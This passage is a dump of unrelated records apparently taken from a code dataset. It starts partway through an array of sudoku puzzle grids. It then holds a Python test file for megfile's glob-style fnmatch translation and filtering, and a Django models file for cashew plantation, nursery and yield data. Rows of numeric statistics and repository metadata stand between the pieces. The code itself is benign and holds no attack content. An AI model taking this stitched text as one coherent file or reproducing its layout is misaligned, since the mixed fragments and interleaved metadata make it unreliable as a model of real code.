[9,0,7,0,0,6,0,0,0],\
[0,3,0,4,0,0,0,1,0],\
[2,0,0,0,0,0,6,0,0]\
],[\
[0,4,0,0,0,0,0,5,0],\
[0,0,1,9,4,3,6,0,0],\
[0,0,9,0,0,0,3,0,0],\
[6,0,0,0,5,0,0,0,2],\
[1,0,3,0,0,0,5,0,6],\
[8,0,0,0,2,0,0,0,7],\
[0,0,5,0,0,0,2,0,0],\
[0,0,2,4,3,6,7,0,0],\
[0,3,0,0,0,0,0,4,0]\
],[\
[0,0,4,0,0,0,0,0,0],\
[0,0,0,0,3,0,0,0,2],\
[3,9,0,7,0,0,0,8,0],\
[4,0,0,0,0,9,0,0,1],\
[2,0,9,8,0,1,3,0,7],\
[6,0,0,2,0,0,0,0,8],\
[0,1,0,0,0,8,0,5,3],\
[9,0,0,0,4,0,0,0,0],\
[0,0,0,0,0,0,8,0,0]\
],[\
[3,6,0,0,2,0,0,8,9],\
[0,0,0,3,6,1,0,0,0],\
[0,0,0,0,0,0,0,0,0],\
[8,0,3,0,0,0,6,0,2],\
[4,0,0,6,0,3,0,0,7],\
[6,0,7,0,0,0,1,0,8],\
[0,0,0,0,0,0,0,0,0],\
[0,0,0,4,1,8,0,0,0],\
[9,7,0,0,3,0,0,1,4]\
],[\
[5,0,0,4,0,0,0,6,0],\
[0,0,9,0,0,0,8,0,0],\
[6,4,0,0,2,0,0,0,0],\
[0,0,0,0,0,1,0,0,8],\
[2,0,8,0,0,0,5,0,1],\
[7,0,0,5,0,0,0,0,0],\
[0,0,0,0,9,0,0,8,4],\
[0,0,3,0,0,0,6,0,0],\
[0,6,0,0,0,3,0,0,2]\
],[\
[0,0,7,2,5,6,4,0,0],\
[4,0,0,0,0,0,0,0,5],\
[0,1,0,0,3,0,0,6,0],\
[0,0,0,5,0,8,0,0,0],\
[0,0,8,0,6,0,2,0,0],\
[0,0,0,1,0,7,0,0,0],\
[0,3,0,0,7,0,0,9,0],\
[2,0,0,0,0,0,0,0,4],\
[0,0,6,3,1,2,7,0,0]\
],[\
[0,0,0,0,0,0,0,0,0],\
[0,7,9,0,5,0,1,8,0],\
[8,0,0,0,0,0,0,0,7],\
[0,0,7,3,0,6,8,0,0],\
[4,5,0,7,0,8,0,9,6],\
[0,0,3,5,0,2,7,0,0],\
[7,0,0,0,0,0,0,0,5],\
[0,1,6,0,3,0,4,2,0],\
[0,0,0,0,0,0,0,0,0]\
],[\
[0,3,0,0,0,0,0,8,0],\
[0,0,9,0,0,0,5,0,0],\
[0,0,7,5,0,9,2,0,0],\
[7,0,0,1,0,5,0,0,8],\
[0,2,0,0,9,0,0,3,0],\
[9,0,0,4,0,2,0,0,1],\
[0,0,4,2,0,7,1,0,0],\
[0,0,2,0,0,0,8,0,0],\
[0,7,0,0,0,0,0,9,0]\
],[\
[2,0,0,1,7,0,6,0,3],\
[0,5,0,0,0,0,1,0,0],\
[0,0,0,0,0,6,0,7,9],\
[0,0,0,0,4,0,7,0,0],\
[0,0,0,8,0,1,0,0,0],\
[0,0,9,0,5,0,0,0,0],\
[3,1,0,4,0,0,0,0,0],\
[0,0,5,0,0,0,0,6,0],\
[9,0,6,0,3,7,0,0,2]\
],[\
[0,0,0,0,0,0,0,8,0],\
[8,0,0,7,0,1,0,4,0],\
[0,4,0,0,2,0,0,3,0],\
[3,7,4,0,0,0,9,0,0],\
[0,0,0,0,3,0,0,0,0],\
[0,0,5,0,0,0,3,2,1],\
[0,1,0,0,6,0,0,5,0],\
[0,5,0,8,0,2,0,0,6],\
[0,8,0,0,0,0,0,0,0]\
],[\
[0,0,0,0,0,0,0,8,5],\
[0,0,0,2,1,0,0,0,9],\
[9,6,0,0,8,0,1,0,0],\
[5,0,0,8,0,0,0,1,6],\
[0,0,0,0,0,0,0,0,0],\
[8,9,0,0,0,6,0,0,7],\
[0,0,9,0,7,0,0,5,2],\
[3,0,0,0,5,4,0,0,0],\
[4,8,0,0,0,0,0,0,0]\
],[\
[6,0,8,0,7,0,5,0,2],\
[0,5,0,6,0,8,0,7,0],\
[0,0,2,0,0,0,3,0,0],\
[5,0,0,0,9,0,0,0,6],\
[0,4,0,3,0,2,0,5,0],\
[8,0,0,0,5,0,0,0,3],\
[0,0,5,0,0,0,2,0,0],\
[0,1,0,7,0,4,0,9,0],\
[4,0,9,0,6,0,7,0,1]\
],[\
[0,5,0,0,1,0,0,4,0],\
[1,0,7,0,0,0,6,0,2],\
[0,0,0,9,0,5,0,0,0],\
[2,0,8,0,3,0,5,0,1],\
[0,4,0,0,7,0,0,2,0],\
[9,0,1,0,8,0,4,0,6],\
[0,0,0,4,0,1,0,0,0],\
[3,0,4,0,0,0,7,0,9],\
[0,2,0,0,6,0,0,1,0]\
],[\
[0,5,3,0,0,0,7,9,0],\
[0,0,9,7,5,3,4,0,0],\
[1,0,0,0,0,0,0,0,2],\
[0,9,0,0,8,0,0,1,0],\
[0,0,0,9,0,7,0,0,0],\
[0,8,0,0,3,0,0,7,0],\
[5,0,0,0,0,0,0,0,3],\
[0,0,7,6,4,1,2,0,0],\
[0,6,1,0,0,0,9,4,0]\
],[\
[0,0,6,0,8,0,3,0,0],\
[0,4,9,0,7,0,2,5,0],\
[0,0,0,4,0,5,0,0,0],\
[6,0,0,3,1,7,0,0,4],\
[0,0,7,0,0,0,8,0,0],\
[1,0,0,8,2,6,0,0,9],\
[0,0,0,7,0,2,0,0,0],\
[0,7,5,0,4,0,1,9,0],\
[0,0,3,0,9,0,6,0,0]\
],[\
[0,0,5,0,8,0,7,0,0],\
[7,0,0,2,0,4,0,0,5],\
[3,2,0,0,0,0,0,8,4],\
[0,6,0,1,0,5,0,4,0],\
[0,0,8,0,0,0,5,0,0],\
[0,7,0,8,0,3,0,1,0],\
[4,5,0,0,0,0,0,9,1],\
[6,0,0,5,0,8,0,0,7],\
[0,0,3,0,1,0,6,0,0]\
],[\
[0,0,0,9,0,0,8,0,0],\
[1,2,8,0,0,6,4,0,0],\
[0,7,0,8,0,0,0,6,0],\
[8,0,0,4,3,0,0,0,7],\
[5,0,0,0,0,0,0,0,9],\
[6,0,0,0,7,9,0,0,8],\
[0,9,0,0,0,4,0,1,0],\
[0,0,3,6,0,0,2,8,4],\
[0,0,1,0,0,7,0,0,0]\
],[\
[0,0,0,0,8,0,0,0,0],\
[2,7,0,0,0,0,0,5,4],\
[0,9,5,0,0,0,8,1,0],\
[0,0,9,8,0,6,4,0,0],\
[0,2,0,4,0,3,0,6,0],\
[0,0,6,9,0,5,1,0,0],\
[0,1,7,0,0,0,6,2,0],\
[4,6,0,0,0,0,0,3,8],\
[0,0,0,0,9,0,0,0,0]\
],[\
[0,0,0,6,0,2,0,0,0],\
[4,0,0,0,5,0,0,0,1],\
[0,8,5,0,1,0,6,2,0],\
[0,3,8,2,0,6,7,1,0],\
[0,0,0,0,0,0,0,0,0],\
[0,1,9,4,0,7,3,5,0],\
[0,2,6,0,4,0,5,3,0],\
[9,0,0,0,2,0,0,0,7],\
[0,0,0,8,0,9,0,0,0]\
],[\
[0,0,0,9,0,0,0,0,2],\
[0,5,0,1,2,3,4,0,0],\
[0,3,0,0,0,0,1,6,0],\
[9,0,8,0,0,0,0,0,0],\
[0,7,0,0,0,0,0,9,0],\
[0,0,0,0,0,0,2,0,5],\
[0,9,1,0,0,0,0,5,0],\
[0,0,7,4,3,9,0,2,0],\
[4,0,0,0,0,7,0,0,0]\
],[\
[3,8,0,0,0,0,0,0,0],\
[0,0,0,4,0,0,7,8,5],\
[0,0,9,0,2,0,3,0,0],\
[0,6,0,0,9,0,0,0,0],\
[8,0,0,3,0,2,0,0,9],\
[0,0,0,0,4,0,0,7,0],\
[0,0,1,0,7,0,5,0,0],\
[4,9,5,0,0,6,0,0,0],\
[0,0,0,0,0,0,0,9,2]\
],[\
[0,0,0,1,5,8,0,0,0],\
[0,0,2,0,6,0,8,0,0],\
[0,3,0,0,0,0,0,4,0],\
[0,2,7,0,3,0,5,1,0],\
[0,0,0,0,0,0,0,0,0],\
[0,4,6,0,8,0,7,9,0],\
[0,5,0,0,0,0,0,8,0],\
[0,0,4,0,7,0,1,0,0],\
[0,0,0,3,2,5,0,0,0]\
],[\
[0,1,0,5,0,0,2,0,0],\
[9,0,0,0,0,1,0,0,0],\
[0,0,2,0,0,8,0,3,0],\
[5,0,0,0,3,0,0,0,7],\
[0,0,8,0,0,0,5,0,0],\
[6,0,0,0,8,0,0,0,4],\
[0,4,0,1,0,0,7,0,0],\
[0,0,0,7,0,0,0,0,6],\
[0,0,3,0,0,4,0,5,0]\
],[\
[0,8,0,0,0,0,0,4,0],\
[0,0,0,4,6,9,0,0,0],\
[4,0,0,0,0,0,0,0,7],\
[0,0,5,9,0,4,6,0,0],\
[0,7,0,6,0,8,0,3,0],\
[0,0,8,5,0,2,1,0,0],\
[9,0,0,0,0,0,0,0,5],\
[0,0,0,7,8,1,0,0,0],\
[0,6,0,0,0,0,0,1,0]\
],[\
[9,0,4,2,0,0,0,0,7],\
[0,1,0,0,0,0,0,0,0],\
[0,0,0,7,0,6,5,0,0],\
[0,0,0,8,0,0,0,9,0],\
[0,2,0,9,0,4,0,6,0],\
[0,4,0,0,0,2,0,0,0],\
[0,0,1,6,0,7,0,0,0],\
[0,0,0,0,0,0,0,3,0],\
[3,0,0,0,0,5,7,0,2]\
],[\
[0,0,0,7,0,0,8,0,0],\
[0,0,6,0,0,0,0,3,1],\
[0,4,0,0,0,2,0,0,0],\
[0,2,4,0,7,0,0,0,0],\
[0,1,0,0,3,0,0,8,0],\
[0,0,0,0,6,0,2,9,0],\
[0,0,0,8,0,0,0,7,0],\
[8,6,0,0,0,0,5,0,0],\
[0,0,2,0,0,6,0,0,0]\
],[\
[0,0,1,0,0,7,0,9,0],\
[5,9,0,0,8,0,0,0,1],\
[0,3,0,0,0,0,0,8,0],\
[0,0,0,0,0,5,8,0,0],\
[0,5,0,0,6,0,0,2,0],\
[0,0,4,1,0,0,0,0,0],\
[0,8,0,0,0,0,0,3,0],\
[1,0,0,0,2,0,0,7,9],\
[0,2,0,7,0,0,4,0,0]\
],[\
[0,0,0,0,0,3,0,1,7],\
[0,1,5,0,0,9,0,0,8],\
[0,6,0,0,0,0,0,0,0],\
[1,0,0,0,0,7,0,0,0],\
[0,0,9,0,0,0,2,0,0],\
[0,0,0,5,0,0,0,0,4],\
[0,0,0,0,0,0,0,2,0],\
[5,0,0,6,0,0,3,4,0],\
[3,4,0,2,0,0,0,0,0]\
],[\
[3,0,0,2,0,0,0,0,0],\
[0,0,0,1,0,7,0,0,0],\
[7,0,6,0,3,0,5,0,0],\
[0,7,0,0,0,9,0,8,0],\
[9,0,0,0,2,0,0,0,4],\
[0,1,0,8,0,0,0,5,0],\
[0,0,9,0,4,0,3,0,1],\
[0,0,0,7,0,2,0,0,0],\
[0,0,0,0,0,8,0,0,6]\
]]
| 21.125249
| 22
| 0.38274
| 4,054
| 10,626
| 1.00296
| 0.003453
| 0.784555
| 0.723807
| 0.588293
| 0.958436
| 0.902853
| 0.799311
| 0.621003
| 0.512051
| 0.403591
| 0
| 0.420954
| 0.094579
| 10,626
| 502
| 23
| 21.167331
| 0.001663
| 0
| 0
| 0.197211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001992
| true
| 0
| 0
| 0.001992
| 0.003984
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
496cf9d45a7840abeb031e02f2b254b24081f7f6
| 4,652
|
py
|
Python
|
tests/lib/test_fnmatch.py
|
bbtfr/megfile
|
7a0d4bd8fa6f52512e99dfd490bf404fb4f5ede0
|
[
"Apache-2.0",
"MIT"
] | 69
|
2021-08-28T15:03:26.000Z
|
2022-03-04T23:43:22.000Z
|
tests/lib/test_fnmatch.py
|
bbtfr/megfile
|
7a0d4bd8fa6f52512e99dfd490bf404fb4f5ede0
|
[
"Apache-2.0",
"MIT"
] | 75
|
2021-08-30T02:36:46.000Z
|
2022-03-29T07:59:11.000Z
|
tests/lib/test_fnmatch.py
|
bbtfr/megfile
|
7a0d4bd8fa6f52512e99dfd490bf404fb4f5ede0
|
[
"Apache-2.0",
"MIT"
] | 9
|
2021-08-30T10:46:52.000Z
|
2022-01-08T08:26:58.000Z
|
import sys
from megfile.lib import fnmatch
def test_translate():
# wildcard
assert fnmatch.translate('?') == fnmatch._compat(r'.')
assert fnmatch.translate('*') == fnmatch._compat(r'[^/]*')
assert fnmatch.translate('**') == fnmatch._compat(r'.*')
assert fnmatch.translate('**/a') == fnmatch._compat(r'(.*/)?a')
if sys.version_info > (3, 7):
assert fnmatch.translate('b**/a') == fnmatch._compat(r'b.*/a')
assert fnmatch.translate('b/**/a') == fnmatch._compat(r'b/(.*/)?a')
assert fnmatch.translate('c/b**/a') == fnmatch._compat(r'c/b.*/a')
else:
assert fnmatch.translate('b**/a') == fnmatch._compat(r'b.*\/a')
assert fnmatch.translate('b/**/a') == fnmatch._compat(r'b\/(.*/)?a')
assert fnmatch.translate('c/b**/a') == fnmatch._compat(r'c\/b.*\/a')
# brackets
assert fnmatch.translate('[abc]') == fnmatch._compat(r'[abc]')
assert fnmatch.translate('[!abc]') == fnmatch._compat(r'[^abc]')
assert fnmatch.translate('[^abc]') == fnmatch._compat(r'[\^abc]')
assert fnmatch.translate('[abc^]') == fnmatch._compat(r'[abc^]')
assert fnmatch.translate('[abc?]') == fnmatch._compat(r'[abc?]')
assert fnmatch.translate('[a-z]') == fnmatch._compat(r'[a-z]')
assert fnmatch.translate('[]') == fnmatch._compat(r'\[\]')
if sys.version_info > (3, 7):
assert fnmatch.translate('[!]') == fnmatch._compat(r'\[!\]')
else:
assert fnmatch.translate('[!]') == fnmatch._compat(r'\[\!\]')
assert fnmatch.translate('[') == fnmatch._compat(r'\[')
# curly braces
assert fnmatch.translate('{a,b}') == fnmatch._compat(r'(a|b)')
assert fnmatch.translate('{a, b}') == fnmatch._compat(r'(a|\ b)')
assert fnmatch.translate('{}') == fnmatch._compat(r'\{\}')
assert fnmatch.translate('{,}') == fnmatch._compat(r'(|)')
assert fnmatch.translate('{') == fnmatch._compat(r'\{')
# weirdos
assert fnmatch.translate('(a|b)') == fnmatch._compat(r'\(a\|b\)')
assert fnmatch.translate('{*,d}') == fnmatch._compat(r'(\*|d)')
assert fnmatch.translate('{**,d}') == fnmatch._compat(r'(\*\*|d)')
assert fnmatch.translate('{[abc],d}') == fnmatch._compat(r'(\[abc\]|d)')
if sys.version_info > (3, 7):
assert fnmatch.translate('{{a,b},d}') == fnmatch._compat(r'(\{a|b),d\}')
else:
assert fnmatch.translate('{{a,b},d}') == fnmatch._compat(
r'(\{a|b)\,d\}')
def test_filter():
file_list = [
'a', 'b', 'c/d', 'd', '*', '**', '[abc]', '(a|b)', '{a', 'b}', '{a,d}',
'[', ']', '[]', '[!]', '{', '}', '{}', '{,}', '^', '!', '?', ','
]
# wildcard
assert fnmatch.filter(file_list, '?') == [
'a', 'b', 'd', '*', '[', ']', '{', '}', '^', '!', '?', ','
]
assert fnmatch.filter(file_list, '*') == [
'a', 'b', 'd', '*', '**', '[abc]', '(a|b)', '{a', 'b}', '{a,d}', '[',
']', '[]', '[!]', '{', '}', '{}', '{,}', '^', '!', '?', ','
]
assert fnmatch.filter(file_list, '**') == [
'a', 'b', 'c/d', 'd', '*', '**', '[abc]', '(a|b)', '{a', 'b}', '{a,d}',
'[', ']', '[]', '[!]', '{', '}', '{}', '{,}', '^', '!', '?', ','
]
assert fnmatch.filter(file_list, '**/d') == ['c/d', 'd']
# brackets
assert fnmatch.filter(file_list, '[abc]') == ['a', 'b']
assert fnmatch.filter(file_list, '[!abc]') == [
'd', '*', '[', ']', '{', '}', '^', '!', '?', ','
]
assert fnmatch.filter(file_list, '[^abc]') == ['a', 'b', '^']
assert fnmatch.filter(file_list, '[abc^]') == ['a', 'b', '^']
assert fnmatch.filter(file_list, '[abc?]') == ['a', 'b', '?']
assert fnmatch.filter(file_list, '[a-z]') == ['a', 'b', 'd']
assert fnmatch.filter(file_list, '[]') == ['[]']
assert fnmatch.filter(file_list, '[!]') == ['[!]']
assert fnmatch.filter(file_list, '[') == ['[']
# curly braces
assert fnmatch.filter(file_list, '{a,b}') == ['a', 'b']
assert fnmatch.filter(file_list, '{a, b}') == ['a']
assert fnmatch.filter(file_list, '{}') == ['{}']
assert fnmatch.filter(file_list, '{,}') == []
assert fnmatch.filter(file_list, '{') == ['{']
# weirdos
assert fnmatch.filter(file_list, '(a|b)') == ['(a|b)']
assert fnmatch.filter(file_list, '{*,d}') == ['d', '*']
assert fnmatch.filter(file_list, '{**,d}') == ['d', '**']
assert fnmatch.filter(file_list, '{[abc],d}') == ['d', '[abc]']
assert fnmatch.filter(file_list, '{{a,b},d}') == ['{a,d}']
def test_fnmatch():
assert fnmatch.fnmatch('a', '{a,b}')
assert fnmatch.fnmatch('b', '{a,b}')
assert not fnmatch.fnmatch('A', '{a,b}')
assert not fnmatch.fnmatchcase('A', '{a,b}')
| 43.476636
| 80
| 0.499785
| 536
| 4,652
| 4.223881
| 0.063433
| 0.321555
| 0.301237
| 0.233657
| 0.887809
| 0.878534
| 0.836131
| 0.833481
| 0.791078
| 0.757509
| 0
| 0.001582
| 0.184652
| 4,652
| 106
| 81
| 43.886792
| 0.595307
| 0.016552
| 0
| 0.119048
| 0
| 0
| 0.146299
| 0
| 0
| 0
| 0
| 0
| 0.690476
| 1
| 0.035714
| false
| 0
| 0.02381
| 0
| 0.059524
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
49871bf683f2d7490bf499e5d671809657ab3a0b
| 15,439
|
py
|
Python
|
authentication/models.py
|
TechnoServe/Caju-Dashboard-v1
|
ee5cde55d5700abd6223bb464fec4efa708dfdfc
|
[
"MIT"
] | null | null | null |
authentication/models.py
|
TechnoServe/Caju-Dashboard-v1
|
ee5cde55d5700abd6223bb464fec4efa708dfdfc
|
[
"MIT"
] | null | null | null |
authentication/models.py
|
TechnoServe/Caju-Dashboard-v1
|
ee5cde55d5700abd6223bb464fec4efa708dfdfc
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2020 - Technoserve
"""
from django.db import models
from django.utils.translation import gettext_lazy as _
from django.core.validators import RegexValidator
from django.contrib.auth.models import User
# Create your models here.
class RemOrganization(models.Model):
class Status():
ACTIVE = 1
INACTIVE = 0
ACTIVE = 1
INACTIVE = 0
Status = [
(ACTIVE, 'Active'),
(INACTIVE, 'Inactive'),
]
# id = models.BigAutoField(primary_key=True)
organization_name = models.CharField(max_length=200, unique=True)
description = models.CharField(max_length=200)
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
phone = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list
# phone = PhoneNumberField(null=False, blank=False, unique=True)
e_mail = models.EmailField(max_length = 254)
website = models.URLField(max_length=254, null=False)
address = models.CharField(max_length=200)
country = models.CharField(max_length=200)
city = models.CharField(max_length=200)
status = models.IntegerField(choices=Status, default=ACTIVE,)
created_by = models.BigIntegerField(null=True)
created_date = models.DateTimeField(blank=True, null=True)
updated_by = models.BigIntegerField(null=True)
updated_date = models.DateTimeField(blank=True, null=True)
def __str__(self):
return self.organization_name
class RemRole(models.Model):
class Status():
ACTIVE = 1
INACTIVE = 0
ACTIVE = 1
INACTIVE = 0
Status = [
(ACTIVE, 'Active'),
(INACTIVE, 'Inactive'),
]
# id = models.BigAutoField(primary_key=True)
role_name = models.CharField(max_length=200)
# organization = models.ForeignKey(RemOrganization, on_delete=models.CASCADE, null=True)
status = models.IntegerField(choices=Status, default=ACTIVE,)
created_by = models.BigIntegerField(null=True)
created_date = models.DateTimeField(blank=True, null=True)
updated_by = models.BigIntegerField(null=True)
updated_date = models.DateTimeField(blank=True, null=True)
def __str__(self):
return self.role_name
class RemUser(models.Model):
class Status():
ACTIVE = 1
INACTIVE = 0
class GenderChoices():
MALE = 'male', _('Male')
FEMALE = 'female', _('Female')
OTHERS = 'others', _('Others')
ACTIVE = 1
INACTIVE = 0
Status = [
(ACTIVE, 'Active'),
(INACTIVE, 'Inactive'),
]
MALE = 'male'
FEMALE = 'female'
OTHERS = 'others'
GenderChoices = [
(MALE, 'Male'),
(FEMALE, 'Female'),
(FEMALE, 'Others'),
]
# id = models.BigAutoField(primary_key=True)
# id = models.DecimalField(primary_key=True, max_digits=50, decimal_places=0)
# password = models.CharField(max_length=200)
first_name = models.CharField(max_length=200)
last_name = models.CharField(max_length=200)
username = models.CharField(max_length=200, unique=True)
# user_id = models.ForeignKey(User, on_delete=models.CASCADE, null=False, unique=True)
# gender = models.CharField(
# max_length=6,
# choices=GenderChoices,
# default=OTHERS,
# )
# date_of_birth = models.DateField(blank=True, null=True)
# phone = PhoneNumberField(null=False, blank=False, unique=True)
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
phone = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list
email = models.EmailField(max_length = 254)
organization = models.ForeignKey(RemOrganization, on_delete=models.CASCADE, null=True)
role = models.ForeignKey(RemRole, on_delete=models.CASCADE, null=True)
# address = models.CharField(max_length=200)
# country = models.CharField(max_length=200)
# city = models.CharField(max_length=200)
# status = models.IntegerField(choices=Status, default=ACTIVE,)
created_by = models.BigIntegerField(blank=True, null=True)
created_date = models.DateTimeField(blank=True, null=True)
updated_by = models.BigIntegerField(blank=True, null=True)
updated_date = models.DateTimeField(blank=True, null=True)
# first_login = models.BooleanField(default=True)
def __str__(self):
return self.username
class Nursery(models.Model):
class Status():
ACTIVE = 1
INACTIVE = 0
class GenderChoices():
MALE = 'male', _('Male')
FEMALE = 'female', _('Female')
OTHERS = 'others', _('Others')
ACTIVE = 1
INACTIVE = 0
Status = [
(ACTIVE, 'Active'),
(INACTIVE, 'Inactive'),
]
MALE = 'male'
FEMALE = 'female'
OTHERS = 'others'
GenderChoices = [
(MALE, 'Male'),
(FEMALE, 'Female'),
(FEMALE, 'Others'),
]
nursery_name = models.CharField(max_length=200, unique=True)
owner_first_name = models.CharField(max_length=200)
owner_last_name = models.CharField(max_length=200)
nursery_address = models.CharField(max_length=200)
country = models.CharField(max_length=200)
commune = models.CharField(max_length=200)
current_area = models.FloatField(null=True)
latitude = models.FloatField(null=True, blank=False)
longitude = models.FloatField(null=True)
altitude = models.FloatField(null=True)
partner = models.CharField(max_length=200)
status = models.IntegerField(choices=Status, default=ACTIVE,)
number_of_plants = models.IntegerField(null=True)
# id = models.BigAutoField(primary_key=True)
# owner_gender = models.CharField(
# max_length=6,
# choices=GenderChoices,
# default=OTHERS,
# )
# owner_date_of_birth = models.DateField(blank=True, null=True)
# owner_phone = PhoneNumberField(null=False, blank=False, unique=True)
# phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
# phone = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list
# owner_address = models.CharField(max_length=200)
# department = models.CharField(max_length=200)
# arrondissement = models.CharField(max_length=200)
# village = models.CharField(max_length=200)
# certified = models.BooleanField(default=False)
# certified_by = models.BigIntegerField(blank=True)
# certified_date = models.DateTimeField(blank=True, null=True)
# website = models.URLField(max_length=254, null=True)
# created_by = models.BigIntegerField(blank=True, null=True)
# created_date = models.DateTimeField(blank=True, null=True)
# updated_by = models.BigIntegerField(blank=True, null=True)
# updated_date = models.DateTimeField(blank=True, null=True)
def __str__(self):
return self.nursery_name
class NurseryPlantsHistory(models.Model):
nursery_id = models.ForeignKey(Nursery, on_delete=models.CASCADE, null=True)
year = models.IntegerField()
season = models.IntegerField()
total_plants = models.BigIntegerField()
total_grafted = models.BigIntegerField()
total_graft_holders = models.BigIntegerField()
polyclonal = models.CharField(max_length=300)
comment = models.CharField(max_length=300)
def __str__(self):
return self.total_plants
class MotherTree(models.Model):
class Status():
ACTIVE = 1
INACTIVE = 0
class GenderChoices():
MALE = 'male', _('Male')
FEMALE = 'female', _('Female')
OTHERS = 'others', _('Others')
ACTIVE = 1
INACTIVE = 0
Status = [
(ACTIVE, 'Active'),
(INACTIVE, 'Inactive'),
]
MALE = 'male'
FEMALE = 'female'
OTHERS = 'others'
GenderChoices = [
(MALE, 'Male'),
(FEMALE, 'Female'),
(FEMALE, 'Others'),
]
# id = models.BigAutoField(primary_key=True)
mother_tree_name = models.CharField(max_length=200, unique=True)
owner_first_name = models.CharField(max_length=200)
owner_last_name = models.CharField(max_length=200)
owner_gender = models.CharField(
max_length=6,
choices=GenderChoices,
default=OTHERS,
)
owner_date_of_birth = models.DateField(blank=True, null=True)
# owner_phone = PhoneNumberField(null=False, blank=False, unique=True)
phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
phone = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list
mother_tree_address = models.CharField(max_length=200)
owner_address = models.CharField(max_length=200)
country = models.CharField(max_length=200)
department = models.CharField(max_length=200)
commune = models.CharField(max_length=200)
arrondissement = models.CharField(max_length=200)
village = models.CharField(max_length=200)
plantation_id = models.CharField(max_length=200)
latitude = models.FloatField(null=False, blank=False)
longitude = models.FloatField(null=True)
altitude = models.FloatField(null=True)
certified = models.BooleanField(default=False)
certified_by = models.BigIntegerField(blank=True)
certified_date = models.DateTimeField(blank=True, null=True)
status = models.IntegerField(choices=Status, default=INACTIVE,)
created_by = models.BigIntegerField(blank=True, null=True)
created_date = models.DateTimeField(blank=True, null=True)
updated_by = models.BigIntegerField(blank=True, null=True)
updated_date = models.DateTimeField(blank=True, null=True)
def __str__(self):
return self.mother_tree_name
class Plantation(models.Model):
class Status():
ACTIVE = 1
INACTIVE = 0
class GenderChoices():
MALE = 'male', _('Male')
FEMALE = 'female', _('Female')
OTHERS = 'others', _('Others')
ACTIVE = 1
INACTIVE = 0
Status = [
(ACTIVE, 'Active'),
(INACTIVE, 'Inactive'),
]
MALE = 'male'
FEMALE = 'female'
OTHERS = 'others'
GenderChoices = [
(MALE, 'Male'),
(FEMALE, 'Female'),
(FEMALE, 'Others'),
]
plantation_name = models.CharField(max_length=200, unique=True)
plantation_code = models.CharField(max_length=200, unique=True)
owner_first_name = models.CharField(max_length=200)
owner_last_name = models.CharField(max_length=200)
owner_gender = models.CharField(
max_length=6,
choices=GenderChoices,
default=OTHERS,
)
total_trees = models.IntegerField(blank=True, null=True)
country = models.CharField(max_length=200)
department = models.CharField(max_length=200)
commune = models.CharField(max_length=200)
arrondissement = models.CharField(max_length=200)
village = models.CharField(max_length=200)
current_area = models.FloatField(null=True)
latitude = models.FloatField(null=False, blank=False)
longitude = models.FloatField(null=True)
altitude = models.FloatField(null=True)
status = models.IntegerField(choices=Status, default=ACTIVE,)
# id = models.BigAutoField(primary_key=True)
# plantation_id = models.CharField(max_length=200, unique=True)
# plantation_age = models.IntegerField(blank=True, null=True)
# owner_date_of_birth = models.DateField(blank=True, null=True)
# owner_phone = PhoneNumberField(null=False, blank=False, unique=True)
# phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.")
# phone = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list
# plantation_address = models.CharField(max_length=200)
# owner_address = models.CharField(max_length=200)
# certified = models.BooleanField(default=False)
# certified_by = models.BigIntegerField(blank=True)
# certified_date = models.DateTimeField(blank=True, null=True)
# partner = models.CharField(max_length=200)
# website = models.URLField(max_length=254, null=True)
# created_by = models.BigIntegerField(blank=True, null=True)
# created_date = models.DateTimeField(blank=True, null=True)
# updated_by = models.BigIntegerField(blank=True, null=True)
# updated_date = models.DateTimeField(blank=True, null=True)
def __str__(self):
return self.plantation_name
class BeninYield(models.Model):
class Status():
ACTIVE = 1
INACTIVE = 0
ACTIVE = 1
INACTIVE = 0
Status = [
(ACTIVE, 'Active'),
(INACTIVE, 'Inactive'),
]
plantation_name = models.CharField(max_length=200)
plantation_code = models.CharField(max_length=200)
department = models.CharField(max_length=200)
commune = models.CharField(max_length=200)
arrondissement = models.CharField(max_length=200)
village = models.CharField(max_length=200)
owner_first_name = models.CharField(max_length=200)
owner_last_name = models.CharField(max_length=200)
plantation_code = models.CharField(max_length=200)
surface_area = models.FloatField(null=True)
total_yield_kg = models.FloatField()
total_yield_per_ha_kg = models.FloatField()
total_yield_per_tree_kg = models.FloatField()
sex = models.CharField(max_length=200)
plantation_id = models.ForeignKey(Plantation, on_delete=models.CASCADE, null=True)
product_id = models.CharField(max_length=60)
total_number_trees = models.FloatField()
total_sick_trees = models.FloatField()
total_dead_trees = models.FloatField()
total_trees_out_of_prod = models.FloatField()
plantation_age = models.FloatField()
latitude = models.FloatField(null=False, blank=False)
longitude = models.FloatField(null=True)
altitude = models.FloatField(null=True)
status = models.IntegerField(choices=Status, default=ACTIVE,)
year = models.IntegerField()
def __str__(self):
return str(self.product_id) + str(self.year)
class AlteiaData(models.Model):
plantation_code = models.CharField(max_length=200, unique=True)
cashew_tree_cover = models.FloatField(null=True)
